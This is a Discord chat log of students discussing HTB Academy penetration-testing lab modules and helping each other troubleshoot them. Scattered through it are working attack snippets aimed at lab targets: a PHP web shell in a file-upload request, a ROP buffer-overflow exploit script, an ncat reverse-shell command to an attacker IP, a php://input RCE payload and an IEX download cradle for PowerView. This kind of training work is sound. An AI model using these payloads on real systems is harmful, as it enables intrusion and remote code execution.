#modules


rustic sage
#

yay finally

thorn urchin
#

I know on the assessment I had a few parts where I needed to test some 7k combinations (that ultimately didn't work) and that woulda been ages in intruder

vital adder
#

also, pls remove the flag name, that's a bit too much of a spoiler (if the flag is named flag then I would say it's fine)

thorn urchin
#

I can only imagine sitting there the whole time in intruder just to confirm it was the wrong path

pastel ginkgo
#

how do y'all feel about zap? it seems kinda meh just by how the module is just like "it's a thing"

thorn urchin
#

The venn diagram of web app pentesters, burp users, and zap users is two circles barely touching each other with zap being alone

pastel ginkgo
#

So no one uses zap?

thorn urchin
#

basically

pastel ginkgo
#

it's open office then

#

at least until recently, now that France made it so all schools cannot use Microsoft Office lol

thorn urchin
#

it's actually more feature complete than burp, but its UI and workflow are so horrendous it's like pulling teeth

pastel ginkgo
#

I mean vim and enums are pulling teeth and people swear by them

thorn urchin
#

and anything zap can do that burp can't (or needs to be paid) can be supplemented by ffuf and other similar tools

#

that's cause those ones only pull teeth while you're learning them. zap always pulls your teeth, always

pastel ginkgo
#

I can't even find an easy download for it on linux

thorn urchin
#

if the zap team got like a modern UI/UX guy to come in and redo the whole interface from scratch, I bet people would be swapping over to it overnight

vital adder
#

oh wait isn't zap open source? if that's the case I think someone should have already done something like that but it's just not official

vital adder
thorn urchin
#

it is open source and if someone actually did make a fork with a slicker UI they need to advertise it better lol

pastel ginkgo
#

same I use vim as well but I have not gone further than a text editor for it

#

I genuinely can't even get zap to download off their own site.

#

I want to finish this module in a day

rough tinsel
#

Thanks

pastel ginkgo
#

I haven't finished an entire module in a day since the very beginning lol

vital adder
#

same can't stop procrastinating

thorn urchin
#

some of the web sections are definitely a breather compared to the AD Module

pastel ginkgo
#

fail, it wouldn't download because I had burpsuite running

vital adder
brazen dust
#

Is there anyone on that can help with Cross-Site Scripting (XSS) - Session Hijacking?

pastel ginkgo
#

@thorn urchin @vital adder For the assessment of Web Proxies how many times did you have to click the button? I've sent it via repeater like 100 times now.

thorn urchin
#

it was a lot

#

idr exactly

vital adder
#

I do remember having some issue with sending that in repeater but I would say it took me under 15 tries (manually)

pastel ginkgo
#

lmao

#

my eyes are burning from staring at this white text

vital adder
#

use dark mode

sly tapir
#

haha

pastel ginkgo
#

idk how to make burpsuite change to dark mode

#

and I've hit the button more than 15 times now

vital adder
#

this isn't dark mode but say this doesn't look good (random screenshot)

pastel ginkgo
#

God bless you my eyes are saved

sly tapir
vital adder
#

i forgot the name give me a sec let me open my burp

pastel ginkgo
#

@west canopy I do not feel lucky anymore like this thing says. This assessment fails to account for those with shit luck. lol

vital adder
thorn urchin
pastel ginkgo
#

Idk how to make fluff do that lol

thorn urchin
#

it'd be kinda annoying ngl

pastel ginkgo
#

|| All I needed to do was remove the disabled portion from the html right?? ||

thorn urchin
#

that's one way

#

I think I just sent it to repeater

pastel ginkgo
#

I feel like I'm doing something wrong at this point

#

I did

#

I keep getting the same response back to click the button

#

jesus what are the odds on this .01% I feel like I'm grinding in WoW again

#

I fixed it

vital adder
#

I just gave it a try and it took me 31 tries

pastel ginkgo
#

Yeah it's bugged

#

I've hit it in the 300+ region now

vital adder
#

I just spammed the new request in firefox and after a bit I got the flag

vital adder
low vine
#

okay going back and finishing up last bits of FFUF module I'm working on Parameter Fuzzing - GET

I've got what should be the correct syntax and I cannot for the life of me understand why it's not running
||ffuf -w /usr/share/payloads/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://admin.academy.htb:32129/admin/admin.php?FUZZ=key||

I've added admin.academy.htb to /etc/hosts file and when running this I get the error
zsh: no matches found: http://admin.academy.htb:32129/admin/admin.php?FUZZ=key

From my understanding this syntax should give me what I'm after but I cannot for the life of me understand why I only get this error.

pastel ginkgo
#

does the flag just show on the page?

vital adder
#

yep

#

I just made a bash loop that basically sends the request 100 times and I only got 3 flags

vital adder
pastel ginkgo
#

Am I repeating the wrong request?

vital adder
pastel ginkgo
#

jesus I'm glad I didn't buy a lottery ticket today, I have zero luck

vital adder
#

I got 3 flags out of 100 tries so your chance is kinda low for this

pastel ginkgo
#

idk how to even send the code to intruder

#

I did the 2nd one in 5 secs because I got bored of clicking send

#

as I've been at it now for 20 mins

#

clearly something isn't working right

vital adder
#

try restarting the target or use an auto clicker in burp repeater, nvm you would miss the flag

pastel ginkgo
#

did the first and the 2nd would mean I wouldn't see it lol

#

I reset the machine and burpsuite at this point

vital adder
#

dm me your target, let me try it with my bash loop to see if it's even possible to get the flag

low vine
#

what the fuck

rustic sage
#

brute force labs are actually the worst🫠

vital adder
#

I never got that issue in the zsh shell

low vine
#

that took me more hours

#

than i care to admit

#

I questioned my sanity

#

twice

#

HTB OVERLORDS WHY ARE YOU TESTING MY SANITY TODAY!

#

Ty, but fuck you ❤️ me

stiff helm
#

hello, I am sitting on the htb academy web request module at the http Headers part, there I should use the web devtools to see some request to a flag. I could solve the rest, but that one I can't solve, started bruteforcing solutions, in my eyes there is no request to a file. They say if there is no request to a flag I should reload the page, you don't know how often I reloaded that page now.., meanwhile I looked into the hint but still no clue what I should do.. is there somebody who can give me a hint? 🙂

forest tapir
#

iirc it's hidden somewhere in the response.

#

don't put money on it, but i feel like I remember that one.

#

or in a cookie... now i'm doubting myself lol

stiff helm
#

thanks for your response, still no clue, but maybe it's buggy. looked up some other walkthroughs concerning this module and it seems to be that this one part got updated.. everything else is the same. maybe another day and then it just works.

#

omg I finally found it, you were absolutely right with the hint concerning the response. my screen is a bit small so I haven't seen that on the right side there is a Response button. thx a lot @forest tapir my hero of the day 🙂

forest tapir
#

Not sure why but it's not seeing my ticket as 'valid'.

#

Password Attacks - PtT From Linux

wheat garden
forest tapir
#

Found the service acc.'s keytab file. Got a TGT, or so I thought...

wheat garden
forest tapir
#

I'll DM you, if you don't mind.

#

Don't wish to spoil

wheat garden
#

ok

worn forge
#

Hey! I need help with Password Attacks Lab - Hard, I could download the vhd file, and I'm trying to crack it but it takes a lot, I got a pw, but it doesn't work when I'm trying to open the mount partition

gentle meteor
#

help me with starting point preignition

#

TASK 6

When using gobuster to dir bust, what switch do we add to make sure it finds PHP pages?

#

@distant oar

#

help a noob out

red obsidianBOT
#

There is no need to use a VPN to connect for any of the CA Challenges, they are all accessible via the public IPs given when started. Not all challenges have an HTTP server however, some you need to connect via nc.

kind turret
worn forge
#

I used rockyou and the mutation password list

kind turret
#

mut_password.list should be enough. Using John right?

worn forge
#

yes, but it takes a lot, I got a 123... pw but it doesn't work

gentle meteor
#

help

worn forge
#

idk what I'm missing

kind turret
#

DM me

worn forge
#

ok thx

gentle meteor
#

👍

worn forge
#

dm me mofo

gentle meteor
#

ok

#

yh pls help

#

@worn forge

rich vale
#

I swear, the AD module is killing me, feels like I'm fighting more with the lab itself and not the actual targets/content

kind turret
#

Why is that

rich vale
#

getting an invalid password when trying to connect to the Windows attack machine

kind turret
#

Share a screenshot if you may

rich vale
#

not sure if I'm doing something wrong? but seems like I'm stuck before even doing the lab work lol

kind turret
#

Use xfreerdp and see maybe?

rich vale
#

ah wow, that actually worked

#

the splash warning is just a black screen when I use xfreerdp, but pressing enter moved past it and logged me in

#

so does rdesktop do anything different? seems like a really specific issue

kind turret
#

try quoting the username htb-student, it might be that

rich vale
#

nope, didn't work but good guess at least. oh well, at least now i can do the lab

#

thanks for that!

winged roost
#

hey all, was wondering if someone could help me. on the active directory - kerberoasting from Windows section - regarding MIMIKATZ. for the life of me, unless I'm going bananas, cannot seem to find the exe file

#

cannot get into the x64 directory, where normally the .exe file is. commands such as mimikatz.exe don't work as it doesn't exist according to PS

kind turret
#

Question 1 or 2 @winged roost ?

#

But, neither of them do actually require mimikatz though

winged roost
kind turret
#

Rubeus?

winged roost
#

thanks, I was having an issue with the format from powerview for offline cracking.

rustic sage
#

yo

rustic sage
#

sup chat

static glacier
fathom mortar
#

Hey guys. I need help at Password Attack Module at protected files section.
I'm doing hydra for user kira on ftp service but it takes sooooo long.
Could anyone help me ? DM please

#

? 😦

silver zenith
#

Maybe it uses other creds then

#

Unictf over back to academy

mystic furnace
#

Hey guys! Is there anybody kind enough for a short nudge with FootPrinting Module hard lab? Better DM not to spoil here. Thanks.

rustic sage
#

Hello I'm stuck at the same place, how did you do that?

sage granite
#

Ok, I have no idea how to solve blacklist filters in the module file upload attacks.

req.txt copied from burp:

POST /upload.php HTTP/1.1
Host: 206.189.116.117:32324
Content-Length: 150
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybldlPLZlzD83jTj9
Origin: http://206.189.116.117:32324
Referer: http://206.189.116.117:32324/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundarybldlPLZlzD83jTj9
Content-Disposition: form-data; name="uploadFile"; filename="shellFUZZ"
Content-Type: image/png

<?php system($_REQUEST['cmd']); ?>

------WebKitFormBoundarybldlPLZlzD83jTj9--

Uploading:

ffuf -request req.txt -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt -c -debug-log d.txt --request-proto http

Checking for execution:

ffuf -u "http://206.189.116.117:32324/profile_images/shellFUZZ?cmd=ls" -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt -c --request-proto http

results:
all lines sized 35, nothing stands out, I have even added the same capsed extensions to that file with extensions and still nothing -.-

thorn urchin
#

need to use a better wordlist

#

the web-extensions one is okay for lightly enumerating some extensions, but not really for bypassing blacklists

rustic sage
#

stuck

unique valve
rustic sage
#

base number?

unique valve
#

In other words just the first number in that version listed 🙂

#

As stated in the challenge question. Windows X. Hint hint

rustic sage
#

Thanks!

unique valve
#

Anytime!

sterile thistle
#

Can someone also help me ?

#

How to fix “context is not defined” in a “from pwn import *” python script?

sage granite
potent ermine
#

Hey guys I'm on the Bind shells lesson. I connected via ssh to the target and set up the listener, and entered the line to generate the shell. However, on the attack side, I only see the text output. Did I miss anything?

sterile thistle
#

#!/usr/bin/env python

from pwn import *

context(os="linux", arch="amd64")

# under Python 3 the payload pieces must all be bytes, so use b"" literals
binsh = b"/bin/sh\x00"
junk = b"A" * (120 - len(binsh))  # filler up to the saved return address
plt_system = p64(0x401040)
test = p64(0x401152)
pop_r13_r14_r15 = p64(0x401206)

payload = junk + binsh + pop_r13_r14_r15 + plt_system + p64(0) + p64(0) + test

p = remote("10.10.10.147", 1337)
p.recvline()
p.sendline(payload)
p.interactive()

#

Traceback (most recent call last):
File "/root/Desktop/tools/exploit/Buffer_overflow/NX_enabled/./pwn.py", line 3, in <module>
from pwn import *
File "/root/Desktop/tools/exploit/Buffer_overflow/NX_enabled/pwn.py", line 5, in <module>
context(os="linux", arch="amd64")
NameError: name 'context' is not defined

thorn urchin
#

looks like context doesn't exist in pwn

#

also if you're posting code to discord wrap it in triple backticks plus the language and you'll get nicely formatted code blocks with syntax highlighting. End the block with another set of triple backticks.

from pwn import *
print("Much better")
sterile thistle
placid quest
#

@thorn urchin hei have u done skills assessment on pivoting because i need a hint if u are free u can dm me

sterile thistle
sage granite
sterile thistle
#
pwn==1.0
pwncat==0.1.2
pwncat-cs==0.5.4
pwnlib==1.2.1
pwntools==4.8.0
#

this is the version I'm using

sage granite
#

Ah, this pwn module is overshadowing your pwntools

sterile thistle
#

how do i fix it?

sage granite
#

pip uninstall pwn

sterile thistle
sage granite
#

Do not reinstall

#

Just uninstall

sterile thistle
#


WARNING: Skipping pwn as it is not installed.
WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv
#
Traceback (most recent call last):
  File "/root/Desktop/tools/exploit/Buffer_overflow/NX_enabled/pwn.py", line 3, in <module>
    from pwn import *
  File "/root/Desktop/tools/exploit/Buffer_overflow/NX_enabled/pwn.py", line 5, in <module>
    context(os="linux", arch="amd64")
NameError: name 'context' is not defined
#

no...

sage granite
#

try python -c 'import pwn;print(pwn.__file__)'

#

I think the problem is that your pwn points to wrong module, still

sterile thistle
#

Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "/root/Desktop/tools/exploit/Buffer_overflow/NX_enabled/pwn.py", line 5, in <module>
    context(os="linux", arch="amd64")
NameError: name 'context' is not defined
#

this is odd

sage granite
#

dude

#

do you have a pwn script in your working directory?

#

like pwn.py ?

#

/root/Desktop/tools/exploit/Buffer_overflow/NX_enabled/pwn.py'
^

sterile thistle
sage granite
#

Cause it says you are importing it from your own folder I guess

sterile thistle
#

yes

sage granite
#

So it won't work

#

Because when you say to python import filename it will try to import shit FROM that file

sterile thistle
#

Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "/usr/local/lib/python3.10/dist-packages/pwn/__init__.py", line 19, in <module>
    pwnlib.update.check_automatically()
AttributeError: module 'pwnlib' has no attribute 'update'
#

i removed the pwn.py

#

and this new error happens

sage granite
#

again, you have some old deprecated and useless modules installed

#

pip uninstall pwnlib

#

on my pc I have just pwntools==4.8.0 when I do
$ pip freeze | grep pwn

sterile thistle
#
pwncat==0.1.2
pwncat-cs==0.5.4
pwntools==4.8.0
sage granite
#

Del this pwncat too

#

I have no idea what this shit is but it is not a part of pwntools currently

sterile thistle
#

Found existing installation: pwncat 0.1.2
Not uninstalling pwncat at /usr/lib/python3/dist-packages, outside environment /usr
Can't uninstall 'pwncat'. No files were found to uninstall.
#

lol

sage granite
#

Okay, it may work now

#

Also, don't run all basic python stuff as root

#

It will give you a burning pileshit of errors

sterile thistle
#

Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "/usr/local/lib/python3.10/dist-packages/pwn/__init__.py", line 19, in <module>
    pwnlib.update.check_automatically()
AttributeError: module 'pwnlib' has no attribute 'update'
sage granite
#

Hmm check python -m pip freeze | grep pwn

sterile thistle
#
pwncat==0.1.2
pwntools==4.8.0
#

can't delete this weird pwncat

#

*uninstall

#
Found existing installation: pwncat 0.1.2
Not uninstalling pwncat at /usr/lib/python3/dist-packages, outside environment /usr
Can't uninstall 'pwncat'. No files were found to uninstall.
sage granite
#

Yeah cuz it's installed globally, try sudo it

#

You did a pretty nice mess there 🙂

sterile thistle
sterile thistle
#

imma just give up this box...

#

@sage granite thank you very much for your help

sage granite
#

I think your pc is kinda messed up a bit with these old pwnlibs

sterile thistle
#

i love you❤️

solar granite
#

@sterile thistle your modules are definitely messed up. I would just reinstall them all if you really need pwntools often. Otherwise, just use a venv whenever you need pwntools

steep loom
#

Can anyone that has completed the Skills assessment for the file upload please give me a hint. I desperately fail to understand the bypassing of the whitelisting with mime typing and would like some help. I have the source code, so I know what/how to bypass the filters but when I do it fails to execute the PHP code. I think because it is looking for image data and I'm passing php after the magic byte? Like I said, any help would be super appreciated, beating my head against the wall at this point

solid quarry
#

Module: Introduction to Windows Command Line
Section: User and Group Management (powershell)
Question: Connect to the target host and search for a domain user with the given name of Robert. What is this users Surname?

Issue: Every time I try the command: Get-ADUser -Filter *, it gives me this error:

Get-ADUser : The server has rejected the client credentials.

Already tried to create a $cred object "Kerberos double hop thing" without success

steep loom
latent sage
#

hello @everyone, please, I need help on the login brute force module, precisely the service authentication section

rustic sage
#

Hmm?

#

What's up

latent sage
#

what I have tried is to brute force the ssh service with the rockyou-5, 10, 15, 20 word lists

#

and with the rockyou.txt file but did not finish the process since the server times out

rustic sage
#

The service or a user?

latent sage
#

since the user is given as "b.gates"

rustic sage
#

Right so- if it isn't a common password

latent sage
#

so i am brute forcing only the password

rustic sage
#

What else could we do to make it more personal?

latent sage
#

using maybe cupp

rustic sage
#

Give it a try and experiment !

latent sage
#

but there are no extra info

rustic sage
#

Bill gates?

#

Give him a search online

latent sage
#

apart from the username

rustic sage
#

So for the CUPP, you'll have to dig a bit further yourself

#

If you're using something else, it's the same

rustic sage
#

Have you started CUPP

latent sage
#

doing so

rustic sage
#

Just give it a read

latent sage
#

had a wordlist given it a try

rustic sage
#

Can anyone help on the

Brute Forcing - Skill Assessment - Website

I'm a little confused if it is telling me to use ||b.gates|| again or start from scratch, could someone just clear this up for me? ^^;

latent sage
rustic sage
#

It's not very clear to me aha-

I've even run like a few different brute forces with default names and passwords but nopeeee.

#

Oh my God I found the pw

latent sage
rustic sage
#

Hello, good day.
I'm currently taking the Learning Process module and I don't quite understand a part of The Process section, sub-section Questioning.

I need clarity on this.

Context: We are in objection to the official definition of what a question is - A question is a sentence worded or expressed to elicit (draw, obtain) information.

The part I don't understand:
"Next, the definition of a question explains its purpose. Therefore, according to the definition, the purpose is to obtain or acquire information.
Let us, therefore, create a situation with a question to test this statement. Let us assume we see host A and host B. To do this, we can ask the following question, which we will also ask during our penetration tests:

How is Host A connected to Host B?
Our goal was to obtain or acquire information with the help of the question posed. Did we obtain or acquire any information from this question? - No."

I can say the information I have obtained from that question is vague, not necessarily no information but something more like what was described earlier as a rough question.

I may be missing something vital in this lesson please help.

rustic sage
#

From the bottom, go upwards.

latent sage
rustic sage
#

Nono trust me

latent sage
solar granite
rustic sage
#

Could I DM someone about Password Attacks Pass the Hash (PtH) under Windows Lateral Movement?

rustic sage
# solar granite I'm not sure I understand what you need help with

Thanks for your response.
"How is Host A connected to Host B?
Our goal was to obtain or acquire information with the help of the question posed. Did we obtain or acquire any information from this question? - No."

I'm in opposition to this view.

It says we have not obtained any information from the question but I believe there's information even though it's not relevant, more like the state "rough question" mentioned earlier. Can you review and tell where I need clarity?

vital adder
waxen barn
#

Attacking Common Services - Easy Skills Assessment. I’ve gotten access to the FTP server and MySQL. I uploaded a web shell where I can do ?cmd= in the URL. The only commands that are working are whoami and dir. How do I get the reverse shell?

raven cairn
#

So on this section and module I have been able to successfully perform the Attack, but I am not sure about the way to get Bross's NTLM hash

#

Would appreciate some help

pastel ginkgo
#

I ended up solving that one by using the hash from the raiseChild.py

#

I recommend taking heavy notes of that module to get past the skills assessment

#

I'm rewriting my notes for it right now. The assessments for that module are a beast!

waxen barn
pastel ginkgo
#

try the base64 one, that tends to work the best for me

waxen barn
#

Ugh, I tried that one for CMD. Didn’t work. You put it following the “cmd=”, correct?

pastel ginkgo
#

what type of encoding should you use if you're pasting a shell into a url?

#

if you're using something like burpsuite it will often encode the payload for you if you set it up, or you can use the rev shells encoder or google an encoder.

waxen barn
#

I tried URL encoding as well

pastel ginkgo
#

try /?c=

rough thunder
#

Hi can anyone help with Linux Priv Esc?

thorn urchin
waxen barn
# pastel ginkgo try ``/?c=``

yep. shell.php?c=ncat.exe 10.10.16.23 4443 -e cmd. I try and URL encode it and base64. I also tried URL encoding it in Burp. Nothing.

thorn urchin
#

honestly I wouldn't bother with a reverse shell, I'd just grab what I need and get out

pastel ginkgo
#

For that one I had to use a rev shell as well

thorn urchin
#

or you could just rewrite your uploaded shell to already be a php reverse shell

pastel ginkgo
#

Btw @thorn urchin did I tell you I could get powerview to work with IEX(New-Object Net.WebClient).downloadString('http://10.10.x.x:8080/PowerView.ps1')

thorn urchin
#

nice

pastel ginkgo
#

saw it in ippsec video and it worked for me

#

idk why putting it on the target host then importing the module didn't work

thorn urchin
#

¯\_(ツ)_/¯

#

in all fairness in real life the IEX method is better anyways cause you're not writing to disk

waxen barn
waxen barn
thorn urchin
#

it definitely isnt 😉

pastel ginkgo
#

lol no that goes to Web Proxies

thorn urchin
#

but the rankings on the labs are all wack

pastel ginkgo
#

I clicked a button 300 times yesterday just to get a flag

thorn urchin
#

easy is definitely the hardest of the three

#

Easy>Hard>Medium

#

its weird

#

I say most annoying is Password Attacks

#

you just got extremely unlucky in web proxies

pastel ginkgo
#

oh yeah password attacks is a bitch and a half but I feel like I learned something

rustic sage
#

I'm on Password Attacks right now and I'm glad y'all agree😅 I think this one should be listed as 2 days not 8 hours.

thorn urchin
#

2 days not cause it's hard, it just wastes your time

rustic sage
#

yeah I don't think it's too challenging so far, it's just a lot of time

thorn urchin
#

it needs a complete passthrough and the correct passwords tweaked to cut down on time spent

rustic sage
#

especially cracking them hashes, mutating password lists, using hydra with the mutated passwords

thorn urchin
#

no legit crack should take longer than 5 minutes from the pwnbox, but you have some instances where it will be 20-30 minutes if you're correct. if you've messed up, good luck, you won't know till the box has to be reset

rustic sage
#

I mean it's an important skill to learn and patience is obviously needed too, but I feel like I can't move on until I finish so I'm far behind now lol

#

I'm still on Pass the Hash attacks

waxen barn
waxen barn
#

Thanks to both @thorn urchin and @pastel ginkgo for the tips

tidal mango
#

Anyone around who might be able to answer a couple questions on the Active Directory skill assessment (part 1)?

tidal mango
gentle meteor
#

TASK 6

When using gobuster to dir bust, what switch do we add to make sure it finds PHP pages?

#

Help!!!

#

-# ###

#

Is the text

gentle meteor
#

Idk where to look

#

Do you have the answer

brisk geode
gentle meteor
#

what does man do?

brisk geode
gentle meteor
#

I look it up

#

But there wasn’t a word to activate php?

#

Pages

brisk geode
#

here u go

gentle meteor
#

Thx bro!

#

I’ll have to go through everything

brisk geode
#

but i would say

brisk geode
tidal mango
# gentle meteor Thx bro!

if you need to know what a flag does you can usually do something like "gobuster dir --help", it will give you some more options on the dir part. "gobuster dir -x php" is probably what you're after. it's helpful to learn to use the help and/or man pages however

tidal mango
brisk geode
tidal mango
cunning obsidian
#

j

sly grotto
#

can someone help me in Password Attacks?

loud sapphire
#

which bit

latent sage
rustic sage
#

hihi

#

Still having problems?

latent sage
#

didn't succeed, tried the whole night without success, can I DM you

rustic sage
#

Sure

short arrow
#

hi

rustic sage
#

Heyo

#

Need some help with Brute Forcing Module -> Website Skill Assessment

Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside?

Do I use the username I just found on the question previous or do I use another? wording is a little confusing.

shy pilot
#

Recently I started doing HTB academy

#

While doing the local file inclusion module, I am getting errors, and the questions they are asking are also in depth, but they explained only a basic minimal level of the theory part.

#

Has anyone completed the file inclusion module? Kindly let me know, I have some doubts regarding that.

turbid kraken
#

Hey guys, I'm trying to wrap my head around some errors/lack of details in the OpenVAS part of the Vulnerability Assessment module.
In the OpenVAS Skills Assessment, I am unable to reach the OpenVAS interface located on <targetIP>:8080

Additionally, I tried putting OpenVAS on my kali machine, but here is the result of my gvm-check-setup:

#
  Test completeness and readiness of GVM-22.4.0
Step 1: Checking OpenVAS (Scanner)... 
        OK: OpenVAS Scanner is present in version 22.4.0.
        OK: Notus Scanner is present in version 22.4.1.
        OK: Server CA Certificate is present as /var/lib/gvm/CA/servercert.pem.
Checking permissions of /var/lib/openvas/gnupg/*
        OK: _gvm owns all files in /var/lib/openvas/gnupg
        OK: redis-server is present.
        OK: scanner (db_address setting) is configured properly using the redis-server socket: /var/run/redis-openvas/redis-server.sock
<...snip...>
Checking that the obsolete redis database has been removed
        OK: No old Redis DB
        OK: ospd-OpenVAS is present in version 22.4.0.
Step 2: Checking GVMD Manager ... 
        OK: GVM Manager (gvmd) is present in version 22.4.0~dev1.
Step 3: Checking Certificates ... 
        OK: GVM client certificate is valid and present as /var/lib/gvm/CA/clientcert.pem.
        OK: Your GVM certificate infrastructure passed validation.
Step 4: Checking data ... 
        OK: SCAP data found in /var/lib/gvm/scap-data.
        OK: CERT data found in /var/lib/gvm/cert-data.
Step 5: Checking Postgresql DB and user ... 
        OK: Postgresql version and default port are OK.
 gvmd      | _gvm     | UTF8     | en_US.UTF-8 | en_US.UTF-8 |            | libc            | 
        ERROR: The new extension pgcrypto does not exist for gvmd database
        FIX: Run 'sudo runuser -u postgres -- /usr/share/gvm/create-postgresql-database'

 ERROR: Your GVM-22.4.0 installation is not yet complete!

Please follow the instructions marked with FIX above and run this
script again.
#

results of sudo runuser -u postgres -- /usr/share/gvm/create-postgresql-database:

#
[i] Database gvmd already exists in PostgreSQL
[i] Role DBA already exists in PostgreSQL

[*] Applying permissions
NOTICE:  role "_gvm" is already a member of role "dba"
GRANT ROLE
[i] Extension uuid-ossp already exists for gvmd database
[i] Extension pgcrypto already exists for gvmd database
[i] Remove old parts from DB for new pg-gvm extension
NOTICE:  view "result_new_severities_dynamic" does not exist, skipping
NOTICE:  view "result_new_severities" does not exist, skipping
NOTICE:  view "result_new_severities_static" does not exist, skipping
NOTICE:  view "result_overrides" does not exist, skipping
NOTICE:  function hosts_contains() does not exist, skipping
NOTICE:  function max_hosts() does not exist, skipping
NOTICE:  function regexp() does not exist, skipping

[*] Creating extension pg-gvm
ERROR:  extension "pg-gvm" has no installation script nor update path for version "22.4.0"
#

Thanks for any help!

rustic sage
turbid kraken
#

@rustic sage can I dm?

rustic sage
#

Of course

rustic sage
spring sigil
#

Is there any way to use these permissions to your advantage for privilege escalation in the final section of the Getting Started module?

User www-data may run the following commands on gettingstarted:
    (ALL : ALL) NOPASSWD: /usr/bin/php

I'm kind of lost at the moment

loud sapphire
#

dm me if needed

spring sigil
#

First thing I checked, not the case though

rustic sage
#

I don't think this is really a spoiler, but there is an amazing resource for Linux privilege escalation, file upload and download, and more. If you can't find it or need help understanding it feel free to dm me @spring sigil

loud sapphire
#

as sudo by the way

rustic sage
rustic sage
spring sigil
#

I couldn't figure out what to do with the commands. I got it now, thank you to both of you:D

broken warren
#

How do I remove junk from the same line in a .txt file? Specifically I'm trying to do the predictable reset token section in the Broken Authentication module. I spun up the php example, I ran the python code they have and I got a bunch of "checking blah blah" and then a token. I have no idea what I'm doing so I'm just trying to strip the "checking" away so I have just tokens but every time I do grep -v " checking blah blah" it either does nothing or hides everything.

broken warren
tawdry glade
#

Module: FILE INCLUSION htb academy
• Remote Code Execution

  • PHP wrappers

I can't capture the output string with the command:
curl "http://<SERVER_IP>:<PORT>/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/X.Y/apache2/php.ini"

My allow_url_include is activated
My PHP version is 8.1

What's wrong?!

solar granite
loud sapphire
thorn ingot
#

Question about HTB machines

Will all machines expect me to know how to privesc (for example) beforehand or are there some that teach me how to do it?

thorn ingot
loud sapphire
thorn ingot
iron plaza
#

Hey guys need a bit of help here:
I am currently doing the Intro to Windows Command Line and one of the questions is: "Connect to the target host and search for a domain user with the given name of Robert. What is this user's surname?"

My answer as per the hint is "Get-ADUser -Filter *" but I get this message in return: "Get-ADUser : The server has rejected the client credentials"

What am I doing wrong?

loud sapphire
tawdry glade
loud sapphire
loud sapphire
tawdry glade
hollow hinge
hollow hinge
rustic sage
#

You'll have to find your own way manually

tawdry glade
# hollow hinge Just `ls` and find flag file and `cat /flagfile.txt`

No I can't..
When I write in the terminal:
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id" | grep uid
the result is:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

But then I don't have a web shell to cat flag.txt

rustic sage
#

Use cd (directory name) to go into a place

tawdry glade
loud sapphire
#

overthinking. don't do that.

loud sapphire
rustic sage
#

I mean you can cd, it just won't do anything, unless you execute multiple commands

loud sapphire
#

lol

solar granite
rustic sage
#

Anyone available for PtT computer impersonation? (Password Attacks module)?

rustic sage
#

Linux

loud sapphire
#

which question?

rustic sage
#

PtT computer impersonation lol

loud sapphire
#

dm me and I will help you go through it all.

red obsidianBOT
#

There is no flag here. Get back to hacking!

rustic sage
rustic sage
#

u

raven cairn
#

Feel stupid lol

coarse birch
#

pls who can send me a link for a hacking app

feral stump
#

Nobody

autumn pilot
#

@coarse birch don't spam the channels

raven cairn
thorn urchin
#

wouldn't hurt to try

raven cairn
raven cairn
thorn urchin
#

rough

raven cairn
#

I've been stuck on this question for soooo long and I know i am missing something super simple 😅

placid quest
#

@raven cairn To transfer the file using Invoke-WebRequest you will need to start a python3 web server

thorn urchin
coarse birch
#

k

#

It is okay guys

#

I will find it

raven cairn
#

Can I have someone DM me? I am so close to finishing this module but I am stuck on this section even tho it should be really easy.

#

Attacking Domain Trusts - Child -> Parent Trusts - from Linux

coarse birch
#

pls I need an app to hack send link

thorn urchin
coarse birch
#

k

#

forget about what I text

#

kk

placid quest
#

@raven cairn use it with powershell

warm kernel
#

anyone here able to give me some clues for the MSSQL question on academy?

vital adder
#

which module and section?

warm kernel
#

Footprinting

#

any standard sql command isn't giving me an output, not even errors

vital adder
#

under the ||Connecting with Mssqlclient.py|| part they did show you some syntax to list databases in mssql

#

and no you can't use syntax from mysql for this

thorn urchin
#

that's also not valid mysql syntax either

warm kernel
#

yeah I tested standard mysql syntax after trying what is shown in the mssqlclient.py example

#

yup, bad example, I had tried them beforehand

#

worth a restart then?

thorn urchin
#

should show a screenshot with your attempted commands using mssql syntax

raven cairn
thorn urchin
#

you might be missing something simple that can be spotted

raven cairn
#

The SQL module can be helpful for SQL queries

thorn urchin
vital adder
raven cairn
#

He's always so nice so it is surprising when he gets angry

#

🤣

warm kernel
thorn urchin
#

no ;

warm kernel
#

no change

#

hence the confusion

thorn urchin
#

select name from master.dbo.sysdatabases;

warm kernel
#

the example doesn't have any either

vital adder
#

you need to use go to run the command but in the example they didn't use go so that's kinda weird but try go after each command

thorn urchin
#

hmm odd, yeah try resetting I suppose

#

yeah thats worth a try too

vital adder
#

so

SQL> go (to run the command you just typed)
warm kernel
#

ah

thorn urchin
#

yeah worth a shot. My client hasn't needed that, but maybe we're using different ones

warm kernel
#

hm still no change, f it. I'm restarting it, lol

#

watch it work on the first try xD

#

and yup, now it works... sorry for the disturbance xD

raven cairn
warm kernel
#

when in doubt, just restart!

raven cairn
placid quest
#

@raven cairn since you wanted to transfer the file with Invoke-WebRequest you would need to use powershell

rustic sage
#

I'm pretty sure you can just run powershell

#

but don't ask me Unix/Linux all the way

raven cairn
#

Oooooh ok

granite patio
#

Can someone help me with precious? I've been trying for like 8 hours and decided to finally find a write up and a video, they're doing exactly what I tried and it's working for them but not for me

granite patio
#

Is that a channel I should be posting in?

raven cairn
#

yes

thorn urchin
#

yeah this channel is for discussing academy modules

granite patio
#

Huh I don't see it

raven cairn
#

It's there but I think you might need to verify

